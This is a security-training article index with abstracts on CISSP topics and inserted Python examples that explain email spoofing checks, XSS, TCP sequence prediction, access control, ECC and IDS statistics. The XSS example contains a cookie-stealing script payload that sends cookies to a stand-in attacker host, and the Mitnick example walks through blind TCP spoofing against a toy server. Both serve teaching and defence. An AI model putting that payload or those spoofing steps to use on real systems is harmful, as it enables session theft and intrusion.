Shon Harris and other team members would like to
share with you the CISSP and information security
articles and materials we have published for various
periodicals.
We will continually be updating this page with
more articles, so please check back often. If you
would like to use any of our material, please e-mail
us at
info@logicalsecurity.com for permission
first and please indicate that the material came
from our web site.
Basic Footprinting
Footprinting an organization before launching an
attack against its resources is essential for an
attacker, because it raises the probability that the
attack succeeds. A burglar who plans to break into a
house first gathers as much information as possible
about the ways in. Similarly, a malicious attacker
who plans to target an online resource first gathers
every piece of information available in order to
build a complete profile of the target's security
posture.
View Article
IT Security Auditors Roles
We have moved into a fascinating time in which
technology has been injected into almost every part
of our lives. We are in the middle of a
metamorphosis that none of us can truly grasp,
because it is hard to view something objectively
while you are right in the middle of it.
View Article
E-mail Threats
E-mail spoofing is a technique used by malicious
users to forge an e-mail so that it appears to come
from a legitimate source. Such e-mails usually
appear to come from known and trusted addresses
when they were actually generated by a malicious
source. Attackers use the technique widely for
spam and phishing.
View Article
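The following is an added example, not code from the original article: a header-level check for the spoofing described above, run against two messages constructed here. It compares the domain in the visible From: header with the envelope sender in Return-Path: and reads the receiving MTA's Authentication-Results: verdicts (SPF and DKIM). The host names, addresses and message ids are made up for the example.

```python
import email
from email.utils import parseaddr

# Constructed sample: the visible From: claims bank.example, but the envelope
# sender and the receiving MTA's own SPF verdict point at a different domain.
SPOOFED_MESSAGE = """\
Return-Path: <bounce@mailer.attacker.example>
Received: from mailer.attacker.example (mailer.attacker.example [192.0.2.10]) by mx.victim.example with ESMTP id 7f3a1c
Authentication-Results: mx.victim.example; spf=fail smtp.mailfrom=mailer.attacker.example; dkim=none header.d=bank.example
From: "Customer Support" <support@bank.example>
To: alice@victim.example
Subject: Urgent: verify your account
Content-Type: text/plain

Please confirm your password at the link below.
"""

# Constructed sample of a message that passes the same checks.
LEGITIMATE_MESSAGE = """\
Return-Path: <support@bank.example>
Received: from mail.bank.example (mail.bank.example [203.0.113.7]) by mx.victim.example with ESMTP id 9b02de
Authentication-Results: mx.victim.example; spf=pass smtp.mailfrom=bank.example; dkim=pass header.d=bank.example
From: "Customer Support" <support@bank.example>
To: alice@victim.example
Subject: Your monthly statement
Content-Type: text/plain

Your statement is attached.
"""


def domain_of(address_header):
    """Extract the lower-cased domain from a header such as 'Name <user@host>'."""
    _, addr = parseaddr(address_header or "")
    return addr.rpartition("@")[2].lower()


def parse_auth_results(value):
    """Turn 'authserv; spf=fail smtp.mailfrom=x; dkim=none ...' into {'spf': 'fail', 'dkim': 'none'}."""
    verdicts = {}
    for clause in (value or "").split(";")[1:]:   # the first clause is the authserv-id
        first = clause.strip().split(" ", 1)[0]
        method, sep, result = first.partition("=")
        if sep:
            verdicts[method.lower()] = result.lower()
    return verdicts


def analyze_headers(raw):
    """Return the extracted domains, the auth verdicts and a list of spoofing indicators."""
    msg = email.message_from_string(raw)
    from_domain = domain_of(msg.get("From"))
    envelope_domain = domain_of(msg.get("Return-Path"))
    auth = parse_auth_results(msg.get("Authentication-Results"))
    findings = []
    if from_domain and envelope_domain and from_domain != envelope_domain:
        findings.append("header From domain '%s' differs from envelope sender domain '%s'"
                        % (from_domain, envelope_domain))
    if auth.get("spf") in ("fail", "softfail", "none"):
        findings.append("SPF result is '%s'" % auth.get("spf"))
    if auth.get("dkim") != "pass":
        findings.append("DKIM result is '%s'" % auth.get("dkim", "missing"))
    return {"from_domain": from_domain, "envelope_domain": envelope_domain,
            "auth": auth, "findings": findings, "suspicious": bool(findings)}


if __name__ == "__main__":
    for name, raw in (("spoofed", SPOOFED_MESSAGE), ("legitimate", LEGITIMATE_MESSAGE)):
        report = analyze_headers(raw)
        print(name, "suspicious" if report["suspicious"] else "clean", report["findings"])
```

A From/Return-Path mismatch on its own is only a heuristic: mailing lists and bulk-mail providers legitimately use their own envelope domain. The reliable signal is the verifier's DMARC alignment result, which is why the function also reads the Authentication-Results header added by your own MTA rather than trusting any header the sender could have written.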
Basic Security Development Issues
Developers are not always aware of the
ever-increasing range of security issues that can be
used to attack their code. This lack of awareness,
combined with tight development timelines, generally
results in applications that are prone to a wide
assortment of attacks.
View Article
Programming Languages
From the era of punched-card instructions to today's
high-level languages, programming languages have
evolved rapidly in their design, approach and dogma.
Although the first three generations of programming
languages can be classified along clearly defined
boundaries, beyond that the classification becomes
blurred and somewhat debatable.
View Article
Web Security Concepts and Attacks
Cross-Site Scripting (XSS) is a class of application
security vulnerability found mainly in web
applications. XSS attacks enable an attacker to
inject malicious code, written in a client-side
scripting language such as JavaScript, into
vulnerable web pages.
View Article
Identity Management
Identity management is a broad and loaded term that
encompasses the use of different products to
identify, authenticate, and authorize users through
automated means. To many people, the term also
includes user account management, access control,
password management, single sign-on functionality,
managing rights and permissions for user accounts,
and auditing and monitoring of all of these items.
The reason that individuals, and companies, have
different definitions and perspectives of identity
management (IdM) is because it is so large and
encompasses so many different technologies and
processes.
View Article
XML Security
If you can remember when HyperText Markup Language
(HTML) was all we had to make a static web page,
you’re old. Being old in the technology world is
different than in the regular world; HTML came out
in the early 1990s. HTML came from Standard
Generalized Markup Language (SGML), which came from
the Generalized Markup Language (GML). We still use
HTML, so it is certainly not dead and gone; the
industry has just improved upon the markup languages
available to use.
View Article
Cross Site Scripting Attacks
Cross Site Scripting (XSS) is a type of web application vulnerability that enables an attacker to inject malicious code
(usually JavaScript) into vulnerable web pages. When an unsuspecting user visits the infected page, the malicious code executes
in the victim's browser and may lead to stolen cookies, hijacked sessions, malware execution or
bypassed access controls, or aid in exploiting browser vulnerabilities.
View Article
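An added example serving both XSS entries on this page (the "Web Security Concepts and Attacks" abstract above and this one); it is not code from either article. A server-side page renderer reflects a search term: the first version concatenates the untrusted string into the HTML and reflects the cookie-stealing payload intact, the second entity-encodes it so the browser shows it as text. A second pair shows the attribute context, where encoding alone does not stop a `javascript:` URL and a scheme allowlist is also needed. The payload, the host `attacker.example` and the `executes_script` oracle are constructed for the example.

```python
import html

# Constructed payload of the kind placed in a reflected URL parameter: it sends
# the victim's cookies to a host the attacker controls.
PAYLOAD = '<script>new Image().src="https://attacker.example/c?"+document.cookie</script>'


def render_results_vulnerable(query):
    """Reflects the search term into the page as-is: the classic reflected XSS bug."""
    return "<h1>Results for: " + query + "</h1>"


def render_results_escaped(query):
    """Same page, but the untrusted text is entity-encoded for HTML element content."""
    return "<h1>Results for: " + html.escape(query, quote=True) + "</h1>"


def render_link_vulnerable(url):
    """Attribute context: a quoted attribute still executes a javascript: URL."""
    return '<a href="' + url + '">back</a>'


def render_link_hardened(url):
    """Allow only http(s) URLs, then entity-encode; anything else falls back to '#'."""
    scheme = url.split(":", 1)[0].lower() if ":" in url else ""
    safe = url if scheme in ("http", "https") else "#"
    return '<a href="' + html.escape(safe, quote=True) + '">back</a>'


def executes_script(page):
    """Crude oracle for these examples: would a browser run attacker script here?"""
    lowered = page.lower()
    return "<script" in lowered or 'href="javascript:' in lowered


if __name__ == "__main__":
    print(render_results_vulnerable(PAYLOAD))   # payload survives: script runs
    print(render_results_escaped(PAYLOAD))      # &lt;script&gt;...: rendered as text
    print(render_link_hardened("javascript:alert(document.cookie)"))   # href="#"
```

Encoding has to match the context the data lands in (element content, attribute, URL, JavaScript string), which is why templating engines that auto-escape per context are preferable to hand-built strings. Marking session cookies HttpOnly limits the damage of the cookie-theft payload shown here, and a Content-Security-Policy that forbids inline script blocks it outright, but neither replaces output encoding.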
Mobile Telephony
Mobile telephony refers to communication using mobile wireless technology.
It is usually classified into four generations, namely 1G, 2G, 3G and 4G.
These generations record the dramatic evolution that mobile telephony has undergone since its introduction nearly 30 years ago.
View Article
Enterprise Methodologies
The Information Technology Infrastructure Library (ITIL) is a set of guidelines and techniques that are used to manage,
improve, and organize the design, development and operations of IT infrastructure.
The major focus of the ITIL is on the constant evaluation and improvement of delivered IT services.
View Article
Security Policies
Security policies provide the foundation for an
organization’s security infrastructure. A security
policy is a document or set of documents that
conveys the management’s intentions and decision on
how security will play a role within the
organization.
View Article
British Standard 7799
The British Standard 7799 is an internationally
recognized set of recommendations for developing
security policies and conducting auditing. The
standard provides comprehensive guidance on many of
the issues related to information security. Many
organizations use British Standard 7799 as a
baseline to start from when developing their
policies and indeed their information security
programs.
View Article
Who’s Who
Acronyms for companies and organizations are often used in
literature without an explanation of who these
organizations are and what their function in the
world is. This section covers many of the
organizations that have been discussed in the
All-In-One CISSP Exam Guide.
View Article
Gramm-Leach-Bliley Act
The Gramm-Leach-Bliley Act was signed into United
States law by President Bill Clinton on November 12,
1999. The act applies to all national banks and
federal branches of foreign banks that are subject
to the supervision of the Federal Reserve System,
the Office of Thrift Supervision (OTS), the
Comptroller of the Currency (OCC) or the Federal
Deposit Insurance Corporation (FDIC). From an
information security standpoint, the act's key
provisions are those that protect individuals'
private financial information.
View Article
Various Networking Components
There are different flavors, characteristics, and standards
underneath the Ethernet umbrella. This article
describes these different components.
View Article
OMB Circular A-123
Before we dive into this one, let's figure out who the OMB is.
Basically this is the group that oversees all
executive branch funding, so when they come down
with a new requirement, government agencies have an
incentive to follow it so that the agencies can
receive funding for the next year.
View Article
Regulation Government Agencies
The Congress and President of the United States delegate
specific authority to federal government agencies.
Others are created at the state level. Federal
agencies have the authority to create regulations,
to enforce regulations, and to arbitrate disputes.
They typically have dedicated enforcement personnel
who operate regionally.
View Article
An Introduction to Firewalling with iptables and pf
In this article we assume the reader knows what a firewall
is and other basic concepts about firewalls, like
the distinction between stateless (static) and
stateful packet filtering. We introduce the reader
to a more technical level, showing how to use two
open source tools, iptables on Linux and pf on
OpenBSD, in a simple case of firewall configuration.
View Article
Passing the Audit
The Public Company Accounting Oversight Board's
standards and the secrets you must know before the
audit. Many IT managers and professionals strongly
believe that although Sarbanes-Oxley compliance
places a heavy and ongoing burden on IT operations,
it also leads to better IT governance and more
effective information security. Unfortunately, this
is not true.
View Article
SOX and Internal Controls
The audit function is, in essence, intended to "check up" on
how a company reports its information, to help
confirm that the company information is reliable.
The mechanisms used by a company to assure the
consistency of its business processes are its
“internal controls.” The “internal controls”
associated with financial reporting are of interest
to auditors, since they help to indicate how much
reliance can be placed on financial information.
View Article
PCI Standards
PCI is all about credit card system security. The credit
card system plays a critical role in the economy.
The system is built from the bricks of various
technologies, owned and operated by different
parties, mortared together with contracts to form an
impressive structure within which a broad range of
commerce can be conducted.
View Article
GLBA Compliance Challenges
Financial institutions and others subject to GLBA find three
aspects of compliance particularly challenging:
1) Assessing and managing risk from third-party vendors.
2) Performing internal risk assessments.
3) Monitoring systems and procedures to detect actual and
attempted attacks on or intrusions into customer information
systems.
View Article
A Satire of the Security Divas of Today
I have been in this industry longer than most people I know and work with. At one time I could keep up with technology, which vendors sold what technology, methodologies, tools, and occasionally my socks that attempted to disappear in the black abyss of my clothes washer.
View Article
What Do CISSPs Really Know?
I have been in the "CISSP world" for over 10 years now. I have taught it for 8 years around the world for corporate and government agencies. I have written books on it, developed products, webinars, study materials, etc. Over the years I have noticed that the students who are attempting to achieve their CISSP certification have changed in their approach. Five years ago people studied material on their own for months before attending a CISSP bootcamp course. This is necessary because no one can really learn the extensive material that the CISSP exam covers in just 5 days. Over the last few years, I have seen a real switch in the approach to achieving this credential.
View Article
Handbook of Malicious Code
Malicious code, or simply malware, is an umbrella
term introduced by the industry that covers a whole
range of unwanted software such as viruses, Trojan
horses, worms, spyware, adware, homepage-resetting
programs and dialers (tracking cookies, although
they are data rather than code, are often lumped in
as well), together with combinations of these, known
as blended attacks. Although each of these has its
own definition and function, malware writers have
combined them to create viruses that are more
damaging and harder to trace.
View Article
How SSL Works
Virtually all businesses, most government agencies and many individuals now have Web sites, and the number of individuals and companies with Internet access is expanding rapidly. Consequently, businesses are enthusiastic about setting up facilities on the Web for electronic commerce. The reality, however, is that the Internet and the Web are extremely vulnerable to attacks of various sorts, so the demand for secure Web services keeps growing.
View Article
The CISSP Exam Is Out of Date, Irrelevant, and Subjective
Busting Through the Myths of the CISSP Exam
For years I have heard people complain about having to learn things for the CISSP exam that they would never use in their life. When I was studying for this exam several years ago, I said the same types of things. I also hear people saying that they have to learn security through (ISC)2's view for this exam, which does not match with reality. The thought on both of these statements is that someone would have to memorize items for the test that are not helpful in their career - thus a waste of time. Again, I fell into this bucket when I studied and took the exam forever ago. Now I see it completely differently.
View Article
Multi-Protocol Label Switching (MPLS)
In recent years, multi-protocol label switching (MPLS) has been gaining prominence and many companies are migrating to it. This is largely because MPLS is a convergence tool that integrates voice, video and data on a single platform, providing quality of service (QoS), improved performance and reliability, and an array of VPN and LAN interconnect services.
View Article
TCP Session Hijacking: the Mitnick Attack
Kevin David Mitnick, also known as "Condor", was born in 1963 and became one of the most famous "crackers". He was repeatedly convicted of minor computer-related offences; his intrusions into large companies eventually led him to prison, where he spent five years (from 1995 to 2000), after a "challenge" against the FBI and the security expert Tsutomu Shimomura. He now runs a computer security consulting company. We do not cover every aspect of Mitnick's contribution to hacking and cracking (among other things, he popularised "social engineering", stealing information directly from people), but focus on the attack he carried out against Shimomura's computers in San Diego. That attack serves well as an example because it shows several interesting aspects: it was a complex attack made up of several coordinated steps, not a single activity.
View Article
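The following is an added simulation, not code from the article, of the mechanism that made the attack above possible: initial sequence numbers (ISNs) that advance by a fixed step, so that a SYN/ACK the attacker never sees can be predicted and the handshake completed blind from a forged trusted source address. The server model, the fixed step of 128000, the rsh-style trust in a single address and the IP addresses are all assumptions made for this example; the same code run with random ISNs shows why the fix works.

```python
import random

MODULUS = 2 ** 32


class TrustingServer:
    """Toy model of the victim: an rsh-style server that trusts any connection whose
    source address is TRUSTED_IP, and that mints ISNs from the supplied generator."""

    def __init__(self, next_isn):
        self.next_isn = next_isn      # callable producing the next initial sequence number
        self.half_open = {}           # (src_ip, src_port) -> ISN sent in our SYN/ACK
        self.sessions = []

    def syn(self, src_ip, src_port):
        isn = self.next_isn()
        self.half_open[(src_ip, src_port)] = isn
        return isn                    # travels to src_ip; a spoofer never sees it

    def ack(self, src_ip, src_port, ack_number):
        """Third handshake packet: accepted only if it acknowledges our ISN + 1."""
        isn = self.half_open.pop((src_ip, src_port), None)
        if isn is not None and ack_number == (isn + 1) % MODULUS:
            self.sessions.append((src_ip, src_port))
            return True
        return False


def bsd_like_isn(step=128_000):
    """ISNs that grow by a fixed step per connection (assumed value for the example)."""
    state = [0]

    def gen():
        state[0] = (state[0] + step) % MODULUS
        return state[0]
    return gen


def random_isn(rng):
    """Unpredictable ISNs, the mitigation adopted after attacks of this kind."""
    return lambda: rng.getrandbits(32)


TRUSTED_IP = "192.0.2.5"       # constructed: the host listed in the server's .rhosts
ATTACKER_IP = "198.51.100.9"   # constructed


def blind_spoof(server):
    # Real attack, step 1: SYN-flood the trusted host so it cannot answer the server's
    # unexpected SYN/ACK with a RST. In this model the trusted host is simply silent.
    # Step 2: open two connections from our own address to observe how the ISN advances.
    first = server.syn(ATTACKER_IP, 40001)
    second = server.syn(ATTACKER_IP, 40002)
    step = (second - first) % MODULUS
    predicted = (second + step) % MODULUS
    # Step 3: SYN with the trusted host's address. The SYN/ACK goes to 192.0.2.5, not to us.
    server.syn(TRUSTED_IP, 1023)
    # Step 4: finish the handshake blind. If the guess is right the server holds a
    # session it believes came from the trusted host, and data appended to it (in
    # the 1994 attack, an rsh command) runs with that trust.
    return server.ack(TRUSTED_IP, 1023, (predicted + 1) % MODULUS)


if __name__ == "__main__":
    print("predictable ISNs:", blind_spoof(TrustingServer(bsd_like_isn())))
    print("random ISNs:     ", blind_spoof(TrustingServer(random_isn(random.Random()))))
```

With the fixed step the forged handshake succeeds every time; with 32-bit random ISNs the guess is right once in about four billion attempts, which is why RFC 6528-style ISN randomisation, together with not trusting a bare source address at all, closed this attack.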
Gramm Leach Bliley Act (GLBA)
In this chapter, we will provide an overview of the Gramm Leach Bliley Act, explore the follow-on regulations issued by the various regulators tasked with implementing the Act, and look at several areas of compliance with GLBA that prove particularly challenging to financial organizations. We will also explore some technologies that can help financial institutions to more easily comply with the provisions of GLBA.
View Article
Payment Card Industry (PCI) Data Security Standard
Various credit card companies have had their own security requirements for years that their merchant customers had to abide by to be able to continue to accept and process credit card payments. For example, MasterCard has its Site Data Protection (SDP) program, American Express has its Data Security Operating Policy (DSOP), Discover has its Information Security and Compliance (DISC), and Visa has its Account Information Security (AIS) and Cardholder Information Security Program (CISP).
View Article
Multiservice Access Technologies
Multiservice access technologies combine several types of communication categories (data, voice, and video) over one transmission line. This provides higher performance, reduced operational costs, and greater flexibility, integration, and control for administrators.
View Article
Sarbanes-Oxley Act of 2002 (SOX)
Sadly, SOX, like many other regulations, was created because some companies were not doing what they were supposed to when it came to disclosing information on the company's financial standing. Some CEOs and CFOs of the past figured out that if they made their company's stock prices go up, then they personally made more money through bonuses, selling their own stocks, and demanding higher salaries.
View Article
Network Scanning Techniques
If you want to gather information about a network on the Internet, the first step is to collect the public information that is available by visiting specific sites or using certain commands. Typically, you can look up information about an organization on the site of a third party that offers such a service. This is, of course, perfectly legal.
View Article
An Introduction to Security in Software Development
Software is produced by human beings and is therefore not perfect but prone to bugs.
Some bugs do not cause visible malfunctions but leave the system exposed to attack: these are security bugs. According to a rough estimate for operating systems, there is about one security bug per 1,000 lines of source code, even assuming programmers competent in secure coding. Given that operating systems such as Windows or Linux comprise on the order of 100 million lines of code, they may contain hundreds of thousands of potential security bugs.
View Article
Fundamentals of Asterisk
Open source software (OSS) has achieved a dominant role in the delivery of IP-based content such as web data (Apache) and email (sendmail), and is making serious headway in streaming media (icecast).
View Article
Firewall
A firewall is a combination of hardware and software that operates in a networked environment to block communications not permitted by the security policy. It is a common layer of defense in computing, a barrier that keeps malicious intrusions away from your computers, and it remains an important mechanism for protecting a company's infrastructure.
View Article
Security Audit
Because new government regulations on security auditing and compliance requirements are passed by the US Congress at every session, CIOs and system and network administrators must update their skills and knowledge regularly. ISO, the world standards body, is also standardizing global business compliance and quality-assurance standards. US companies and their affiliates in the European Union are adopting these and other quality standards, largely to produce the computer audit trails that are essential to reducing litigation or legal prosecution.
View Article
3 Attack Vectors: Web Code
So now the infrastructure of your web-based application should be up to snuff. Completing that is the first step to securing your application: the infrastructure is the foundation of your system, and it must be solid if you want a strong and secure application that no one will be afraid to use because of security flaws.
3 Attack Vectors: DB, OS, Hardware
As discussed previously, with the move of what used to be internal components out to the "cloud", anything that is not web code can be considered infrastructure. Infrastructure can be further subdivided into hardware and software for those who need to address the risks and vulnerabilities of those subsystems separately.
View Article
3 Attack Vectors: Overview
Most articles focus on one aspect of web security: cross site scripting, SQL injection, or web server vulnerabilities are the main focus of the author. A more holistic approach is to see how all the different facets come together and how each one holds up the others to secure a web application. The three vectors through which any application can be attacked are the infrastructure, the web code and the end points. This series will examine each vector in detail and give suggestions on how to protect each one. This first article in the series takes a general overview, and subsequent articles go into more detail. Because the attacks change daily, a number of web sites will be referenced for up-to-the-minute information.
View Article
VoIP
Voice over Internet Protocol (VoIP) technology converts analogue voice signals into digitized
packets that are delivered to the recipients over data networks. VoIP is another example of how the
Internet has changed the way we communicate, and of the emerging convergence in which voice, data,
video and so on pass through a single medium. It uses existing networks and Internet infrastructure
to send information efficiently and at lower cost.
Steps to Better Secure Your Mac
While the Macintosh platform is now becoming the target of the same sort of organized crime that affects Windows users, these attacks are still very limited in scope and in impact. Nonetheless, Mac users cannot afford to be complacent.
Biometrics Defined
Biometrics verifies an individual's identity by analyzing a unique personal attribute or behavior; it is one of the most effective and accurate methods of verifying identity.
View Article
Malicious Software: Viruses
Malicious software, often abbreviated to "malware", is software designed to infiltrate or damage
a computer system without the owner's informed consent; to do so, it has to penetrate the system
while evading its controls.
GLBA Suggestions
GLBA deals only with customer data, not business-to-business data. It can be overridden by other laws and regulations, because the OCC and other agencies impose requirements beyond customer-data protection: the OCC is there to assess the integrity of the bank, not just to protect customer data.
Access Control Methods
The purpose of this article is to introduce, from a theoretical point of view, the main access control methods, in order to provide a better understanding of methods to reinforce the security policy that are based on these concepts. We'll concentrate above all on Mandatory Access Control.
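An added example, not code from the article, of the mandatory access control decision the abstract refers to: a Bell-LaPadula check over labels made of a hierarchical level plus need-to-know compartments. Reads are allowed only when the subject's label dominates the object's (no read up); writes only when the object's label dominates the subject's (no write down). The levels, compartment names and the subject and object labels are constructed for the example.

```python
from dataclasses import dataclass
from enum import IntEnum


class Level(IntEnum):
    PUBLIC = 0
    CONFIDENTIAL = 1
    SECRET = 2
    TOP_SECRET = 3


@dataclass(frozen=True)
class Label:
    """A MAC label: a hierarchical level plus a set of need-to-know compartments."""
    level: Level
    compartments: frozenset = frozenset()


def dominates(a, b):
    """a dominates b when a's level is at least b's and a holds every compartment of b.
    Labels that share neither relation (e.g. equal level, disjoint compartments) are
    incomparable: neither dominates, so neither read nor write is permitted."""
    return a.level >= b.level and b.compartments <= a.compartments


def may_read(subject, obj):
    """Bell-LaPadula simple security property: no read up."""
    return dominates(subject, obj)


def may_write(subject, obj):
    """Bell-LaPadula *-property: no write down (the object must dominate the subject)."""
    return dominates(obj, subject)


def decide(subject, obj, op):
    """Mandatory decision for 'read' or 'write'; the subject cannot override it."""
    return {"read": may_read, "write": may_write}[op](subject, obj)


# Constructed labels for a quick check; the names are only dictionary keys.
LABELS = {
    "analyst":        Label(Level.SECRET, frozenset({"crypto"})),
    "public_memo":    Label(Level.PUBLIC),
    "crypto_report":  Label(Level.SECRET, frozenset({"crypto"})),
    "nuclear_report": Label(Level.SECRET, frozenset({"nuclear"})),
    "ts_plan":        Label(Level.TOP_SECRET, frozenset({"crypto"})),
}

if __name__ == "__main__":
    subject = LABELS["analyst"]
    for name in ("public_memo", "crypto_report", "nuclear_report", "ts_plan"):
        obj = LABELS[name]
        print("%-15s read=%-5s write=%s" % (name, decide(subject, obj, "read"),
                                            decide(subject, obj, "write")))
```

The "write up but not down" outcome (the SECRET analyst may append to the TOP_SECRET plan but not to the public memo) is the property that distinguishes MAC confidentiality models from the discretionary file permissions most administrators are used to: it exists to stop a compromised or careless process from leaking data downward, not to stop the user from doing something they want to do.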
What the Botnets Are Netting and for Whom
The greatest threat to online and offline businesses today is not terrorists or even cyber-terrorists, but good old-fashioned organized crime groups using fancy new tools on the Internet to fleece the unsuspecting public, governments and global corporations. Computer crimes against businesses are increasing at an alarming rate, and their cost, like other business costs, is always passed on to the customer.
Introduction to Elliptic Curve Cryptography
The purpose of this article is to introduce the reader to Elliptic Curve Cryptography.
Most of the products and standards that use public-key cryptography for encryption and digital signatures use RSA, the Rivest-Shamir-Adleman algorithm, whose security rests on the difficulty of factoring the product of two large prime numbers; this is what makes deriving the private key from the public key computationally infeasible.
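An added worked example, not code from the article, of the arithmetic behind elliptic curve cryptography: point addition and doubling on a curve over a prime field, scalar multiplication by double-and-add, and a Diffie-Hellman exchange built on it. The curve y² = x³ + 2x + 2 over GF(17) with generator (5, 1) of order 19 is a textbook-sized choice made for the example so that every value can be checked by hand; real deployments use curves such as P-256 or Curve25519 with roughly 256-bit primes. The private keys 3 and 7 are likewise constructed. Requires Python 3.8+ for the three-argument `pow` with exponent -1.

```python
# Toy curve: y^2 = x^3 + A*x + B over GF(P_MOD). Constructed textbook parameters.
P_MOD = 17
A, B = 2, 2
G = (5, 1)          # generator; the group has prime order 19, so every point generates it
ORDER = 19
INF = None          # the point at infinity, the group's identity element


def is_on_curve(pt):
    if pt is INF:
        return True
    x, y = pt
    return (y * y - (x ** 3 + A * x + B)) % P_MOD == 0


def point_add(p, q):
    """Group law: chord-and-tangent addition with all arithmetic mod P_MOD."""
    if p is INF:
        return q
    if q is INF:
        return p
    x1, y1 = p
    x2, y2 = q
    if x1 == x2 and (y1 + y2) % P_MOD == 0:
        return INF                                   # p == -q
    if p == q:                                       # doubling: tangent slope
        lam = (3 * x1 * x1 + A) * pow((2 * y1) % P_MOD, -1, P_MOD) % P_MOD
    else:                                            # addition: chord slope
        lam = (y2 - y1) * pow((x2 - x1) % P_MOD, -1, P_MOD) % P_MOD
    x3 = (lam * lam - x1 - x2) % P_MOD
    y3 = (lam * (x1 - x3) - y1) % P_MOD
    return (x3, y3)


def scalar_mult(k, pt):
    """k * pt by double-and-add; this is the one-way function ECC relies on."""
    result, addend = INF, pt
    while k:
        if k & 1:
            result = point_add(result, addend)
        addend = point_add(addend, addend)
        k >>= 1
    return result


def ecdh(priv_a, priv_b):
    """Each side publishes priv*G and multiplies the other's point by its own secret."""
    pub_a = scalar_mult(priv_a, G)
    pub_b = scalar_mult(priv_b, G)
    return scalar_mult(priv_a, pub_b), scalar_mult(priv_b, pub_a)


def brute_force_log(pub):
    """Recover k from k*G by exhaustive search: feasible only because the group is tiny."""
    for k in range(1, ORDER + 1):
        if scalar_mult(k, G) == pub:
            return k
    return None


if __name__ == "__main__":
    for k in range(1, ORDER + 1):
        print(k, scalar_mult(k, G))
    shared_a, shared_b = ecdh(3, 7)
    print("shared secret agrees:", shared_a == shared_b, shared_a)
    print("discrete log of Bob's key:", brute_force_log(scalar_mult(7, G)))
```

The contrast with the RSA description above is the hard problem: RSA rests on factoring, ECC on the elliptic curve discrete logarithm, which is why `brute_force_log` works here but would not on a 256-bit curve, and why ECC gets comparable security from far shorter keys.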
Introduction to Intrusion Detection Systems
An Intrusion Detection System (IDS) is an important means of protecting IT systems from external attacks. IDSs are passive monitoring systems: they detect attacks or potential attacks and can send alert messages, but they do not interfere with the monitored system or its events.
Base-Rate Fallacy Considerations
In this article Bayesian statistics is applied to Intrusion Detection Systems (IDSs), in particular to false positives and false negatives, that is, alarms without a real threat and threats the IDS fails to detect. What is the relation between false positives and false negatives? Which one matters more? Should both be minimized in the same way, or one more than the other?
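An added example, not code from the article, carrying the Bayesian argument through: given the base rate of intrusions among monitored events, the detection rate and the false alarm rate, compute the probability that an alarm is real, the probability that a silent event is still an intrusion, and the false alarm rate an IDS would need to reach a chosen precision. The figures used in the `__main__` section (one intrusion per 100,000 events, a million events a day) are assumptions chosen to make the effect visible, not measurements.

```python
def p_intrusion_given_alarm(base_rate, detection_rate, false_alarm_rate):
    """Bayes' rule: P(I | A) = P(A | I) P(I) / [P(A | I) P(I) + P(A | not I) P(not I)]."""
    true_alarms = detection_rate * base_rate
    false_alarms = false_alarm_rate * (1.0 - base_rate)
    return true_alarms / (true_alarms + false_alarms)


def p_intrusion_given_no_alarm(base_rate, detection_rate, false_alarm_rate):
    """P(I | no A): how likely an event that raised no alarm is still an intrusion."""
    missed = (1.0 - detection_rate) * base_rate
    quiet = (1.0 - false_alarm_rate) * (1.0 - base_rate)
    return missed / (missed + quiet)


def required_false_alarm_rate(base_rate, detection_rate, target_precision):
    """Largest P(A | not I) that still yields P(I | A) >= target_precision.
    Derived by solving T / (T + F) = target for F, then dividing by P(not I)."""
    true_alarms = detection_rate * base_rate
    return true_alarms * (1.0 - target_precision) / (target_precision * (1.0 - base_rate))


def daily_alarm_mix(events_per_day, base_rate, detection_rate, false_alarm_rate):
    """Expected (true alarms, false alarms) per day: what the analyst actually sees."""
    intrusions = events_per_day * base_rate
    return (intrusions * detection_rate,
            (events_per_day - intrusions) * false_alarm_rate)


if __name__ == "__main__":
    base = 1e-5            # assumed: one intrusion per 100,000 monitored events
    for fpr in (1e-3, 1e-4, 1e-5, 1e-6):
        print("FPR %.0e -> P(intrusion | alarm) = %.3f" %
              (fpr, p_intrusion_given_alarm(base, 1.0, fpr)))
    print("FPR needed for 90%% precision: %.2e" % required_false_alarm_rate(base, 1.0, 0.9))
    print("per day at 1e6 events, 99%% detection, FPR 1e-4: true=%.1f false=%.1f" %
          daily_alarm_mix(1_000_000, base, 0.99, 1e-4))
```

The answer to the article's question falls out of the numbers: with a low base rate, even a perfect detection rate and a false alarm rate of one in a thousand leaves fewer than one alarm in a hundred being real, so the false positive rate, not the detection rate, is what determines whether the alarms can be acted on at all. The false negative side, by contrast, stays negligible in absolute terms because it is bounded by the base rate.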
What Are the Dangers of Instant Messaging?
SELinux and AppArmor: An Introductory Comparison
In another article, “Hardening Linux Systems in the Application Layer: Why It's Important”, I explained the importance of hardening our Linux systems by reinforcing the security policy in the application layer too. As I said, SELinux is not the only available tool for this purpose.
How VoIP Really Works
Voice over Internet Protocol (VoIP) is the set of protocols (conventions or standards) and technologies that govern the transmission of voice over the Internet or other packet-switched networks (networks in which small units of data called packets are routed through the network). In other words, VoIP uses a broadband Internet connection, such as cable or DSL, to route telephone calls.
A Family of EAP’s (or Is It a Flock of EAP’s?)
Historically, operating systems and many applications have utilized their own authentication
mechanisms to validate a user and grant access to network resources. As the world becomes ever
more integrated, the authentication processes on a network must not only satisfy the security
concerns of identifying the validity of a user to the resource, and vice versa,
How Do Bots and Botnets Work?
Basically, a bot is a program that performs automated tasks, often mimicking human behavior; bots are a definite risk to the security of home computers online.
Reinforcing the Security Policy of Linux Systems
In my professional life I see that Linux systems, in several cases Red Hat Enterprise/Advanced Linux distributions, are protected at the network level, with firewalls and other measures, but system administrators often do not have deep knowledge of application-level security,
Back to School: IT Training Services
"Training is always the last thing on the mind of the people with the purse strings, and it's usually the first thing to go when the budget gets cut," says Shon Harris.
View Article
Role Model
Identity management is a critical security challenge, but without viable standards for access control, your best efforts may be just a drop in the bucket.
View Article
Introduction to Security Governance
Security governance is very similar in nature to corporate and IT governance because there is overlapping functionality and goals between the three. All three work within an organizational structure of a company and have the same goals of helping to ensure that the company will survive and thrive – they just each have different focuses.
Corporate governance has to do with how the board of directors and executive management run and control a company. IT governance is how technology is used and managed so that it supports business needs. There are many professional and official sounding definitions of security governance such as the following by the IT Governance Institute in its Board Briefing on IT Governance, 2nd Edition:
View Article
Risk Management Guide
